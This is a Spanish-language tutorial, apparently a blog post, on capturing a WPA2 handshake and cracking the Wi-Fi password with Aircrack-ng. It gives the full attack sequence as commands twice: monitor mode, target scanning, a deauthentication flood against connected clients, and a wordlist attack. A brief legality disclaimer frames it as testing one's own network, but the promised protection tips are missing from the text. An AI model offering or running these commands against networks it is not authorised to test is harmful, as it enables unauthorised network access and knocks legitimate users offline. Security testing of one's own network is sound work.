Descubre cómo comprobar la seguridad de tu red Wi-Fi usando Aircrack-ng paso a paso y protege tu conexión contra ataques con consejos prácticos.
Con el crecimiento de la popularidad del Wi-Fi, también aumentan los riesgos relacionados con la seguridad de las redes inalámbricas. Si deseas asegurarte de la fiabilidad de tu red o simplemente te interesa conocer métodos de protección, es importante entender cómo se puede comprometer tu propia red.
En este artículo explicaré el proceso para obtener la contraseña de una red Wi-Fi con cifrado WPA2 usando Aircrack-ng. Recuerda que el uso de estos métodos debe ser estrictamente dentro del marco legal y únicamente para probar tus propias redes.
Antes de empezar, asegúrate de contar con todas las herramientas necesarias:
Iwconfig
Encuentra el nombre de tu interfaz inalámbrica (por ejemplo, wlan0).
sudo airmon-ng start wlan0
Sustituye wlan0 por el nombre de tu adaptador Wi-Fi.
sudo airodump-ng wlan0mon
Después de este comando, tu adaptador comenzará a escanear todas las redes Wi-Fi disponibles. Localiza la red que deseas comprometer y toma nota de su BSSID y del canal (CH).
sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write handshake wlan0mon
Reemplaza <BSSID> con el BSSID de la red que deseas atacar y <CHANNEL> con el número del canal. handshake es el nombre del archivo en el que se guardará la captura.
En una nueva terminal, ejecuta:
sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon
La orden enviará paquetes de desautenticación para forzar a los clientes de la red a reconectarse y así capturar el handshake WPA2.
sudo aircrack-ng -w wordlist.txt -b <BSSID> handshake-01.cap
Reemplaza wordlist.txt con el archivo que contiene la lista de contraseñas. <BSSID> es el BSSID de la red objetivo. handshake-01.cap es el archivo de captura que se generó en el paso anterior.
Si Aircrack-ng logra descifrar la contraseña con éxito, la mostrará en la terminal. Podrás utilizar esa contraseña para conectarte a la red Wi-Fi.
# Ponemos el adaptador en modo monitor
sudo airmon-ng start wlan0
# Escaneamos redes y encontramos el objetivo
sudo airodump-ng wlan0mon
# Iniciamos la captura de paquetes en la red objetivo
sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write handshake wlan0mon
# En otra terminal iniciamos la desautenticación de los clientes
sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon
# Una vez capturado el handshake, comenzamos con la fuerza bruta de contraseñas
sudo aircrack-ng -w wordlist.txt -b <BSSID> handshake-01.cap
Para no convertirte en víctima de este tipo de ataque, aquí tienes algunos consejos que cada usuario debería seguir:
En esta guía he mostrado los pasos básicos para interceptar y analizar el handshake WPA2 utilizando Aircrack-ng. Ahora puedes ver que no es especialmente difícil vulnerar una red Wi-Fi ajena, sobre todo si no está bien protegida.
Conocer los métodos que pueden usar los hackers para romper WPA2 te ayuda a prepararte mejor y protegerte de posibles amenazas. Sigue las medidas de protección y utiliza el conocimiento adquirido únicamente dentro de la ley. ¡Mantente seguro y protege tus redes!